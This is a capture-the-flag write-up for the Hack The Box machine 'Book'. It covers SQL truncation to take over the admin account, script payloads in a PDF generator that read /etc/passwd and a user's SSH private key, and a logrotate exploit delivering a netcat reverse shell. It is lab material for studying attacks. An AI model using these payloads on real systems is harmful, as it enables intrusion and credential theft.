Capture The Flag

Hack The Box – Book Write Up

Nmap

root@kali:~# nmap -sT -sV 10.10.10.176 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 17:12 EDT
Nmap scan report for 10.10.10.176
Host is up (0.049s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.73 seconds

User Flag

Visiting port 80, we find a login page:

Using the sign-up button, we can register a new user and log in to the application:

There are several functions, but the most interesting one is Book Submission (we will need it later):

With further enumeration, we find another login form at http://10.10.10/admin.

We know the admin email address and the administrator login panel, so we need a way to log in as admin@book.htb. Inspecting the source code at http://book.htb/index.php, we can see there is a restriction on the email and username length:

There is an attack that applies where a length restriction exists and the database is misconfigured: the SQL truncation attack. This blog explains the attack. In our case there is a restriction of 20 characters on the email address, so we use the email admin@book.htb followed by 6 spaces and a random character to reach 21 characters: the database silently cuts the value back to 20 characters, leaving admin@book.htb padded with trailing spaces, which compares equal to the existing admin address. Using Burp Suite, I registered a new user with the string “admin@book.htb++++++7” (the plus signs are URL-encoded spaces) as the email:

Using the email admin@book.htb and the password syrion, I was able to log in to the administrator panel:
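The truncation mechanism behind this sign-up, as an added illustration that is not code from the write-up or from the Book application: a constructed in-memory stand-in for the users table (the class, its flags and the admin password are assumptions) mimics MySQL's non-strict truncation and trailing-space-insensitive comparison, beside a sign-up check that normalises and length-validates before querying; the 20-character limit and the padded email come from the write-up. The last two demo calls go beyond the write-up to show that strict SQL mode or a UNIQUE index on the column would also have rejected the row.

```python
EMAIL_COLUMN_WIDTH = 20  # the email length limit noted in the write-up

class UserTable:
    """Constructed stand-in for the users table (an assumption, not the Book
    application's code). strict=False mimics MySQL without STRICT_TRANS_TABLES:
    overlong values are silently cut; comparisons ignore trailing spaces (PAD SPACE)."""
    def __init__(self, strict=False, unique=False):
        self.strict, self.unique, self.rows = strict, unique, []
    @staticmethod
    def same(a, b):
        return a.rstrip(" ") == b.rstrip(" ")
    def exists(self, email):
        return any(self.same(e, email) for e, _ in self.rows)
    def insert(self, email, password):
        if len(email) > EMAIL_COLUMN_WIDTH:
            if self.strict:
                raise ValueError("data too long for column")
            email = email[:EMAIL_COLUMN_WIDTH]  # silent truncation
        if self.unique and self.exists(email):
            raise ValueError("duplicate entry")
        self.rows.append((email, password))
    def login(self, email, password):
        return any(self.same(e, email) and p == password for e, p in self.rows)

def vulnerable_signup(table, email, password):
    # The raw 21-char input differs from the admin address; truncation comes later.
    if table.exists(email):
        return False
    table.insert(email, password)
    return True

def hardened_signup(table, email, password):
    # Normalise first, then enforce the length limit before touching the DB.
    email = email.strip().lower()
    if not email or len(email) > EMAIL_COLUMN_WIDTH or table.exists(email):
        return False
    table.insert(email, password)
    return True

def demo(signup, strict=False, unique=False):
    # Returns (sign-up accepted?, can "syrion" now log in as the admin?).
    table = UserTable(strict, unique)
    table.insert("admin@book.htb", "correct-horse")  # constructed admin row
    payload = "admin@book.htb" + " " * 6 + "7"       # 21 chars, as in the write-up
    try:
        accepted = signup(table, payload, "syrion")
    except ValueError:  # strict mode or a UNIQUE index rejects the row
        accepted = False
    return accepted, table.login("admin@book.htb", "syrion")
```

demo(vulnerable_signup) returns (True, True), while demo(hardened_signup), demo(vulnerable_signup, strict=True) and demo(vulnerable_signup, unique=True) all return (False, False).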

The Collections function lets us download a PDF containing the users or a PDF containing the collection of books:

Because a normal user can submit a book, we are going to focus on that one. Let’s create a book and see what happens when we download the collections:

This is the downloaded PDF; each value in the “link” column links to the corresponding PDF file:

After several hours of “frustration”, I found this article. The PDF generator renders the book title as HTML, so a script placed there executes during the conversion and can fetch local files. Using the following input as the Book Title, we are able to read the /etc/passwd file:

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

In the collections PDF, we find the passwd content:

We know there is a user called reader, so we can try to read its SSH key. For this purpose I used the following payload as the Book Title:

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>

And yes, we got the private key:

Using the private key, we can connect over SSH:

Root Flag

In the user’s home directory there is a folder called backups, which contains some log files:

Using pspy, we can see there is a logrotate process running as root:

There is an exploit for logrotate here. I created the payload with a bash reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.27 4444 >/tmp/f

We have to run logrotten on the /home/reader/backups/access.log file. After writing the string “syrion” to the access.log file, we got command execution.
